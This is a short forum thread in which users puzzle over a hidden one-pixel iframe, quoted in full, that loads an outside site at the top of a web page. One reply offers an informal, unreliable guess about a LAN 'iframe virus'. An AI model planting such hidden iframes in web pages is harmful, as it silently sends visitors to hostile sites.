You are welcome to look around. You will have to register before you can post a message, create a blog, chat live with our members, or add a site to our directory.
I see on their page this iframe for the first line on the page:
<iframe src='http://www.klassic.info' width='1' height='1' style='visibility:
hidden;'></iframe><html>
I don't know what to think about this...just weird
Well it's not my website, it's another website linking to mine, for some reason.
I'm 100% sure my PC isn't infected as I run Gentoo Linux. That is interesting though. I wonder how my brand new proxy site ended up on there
Hi,
I have actually faced the same problem , it is not just ur website try to check source of every website u open u will find it at top .
I think u are on a LAN on which someones computer is infected with iframe virus ( That is what happened to me ) you can do nothing else but contact ur ISP to figure out the issue
It's just me and myself on my local network here. And they way I noticed it was I saw a bunch of referrals hitting my site from that fishwhatever.ru site.
I run Gentoo Linux. I appreciate you trying, but this issue did not originate from me. It's another page with an iframe (not my page) linking to one of my proxies.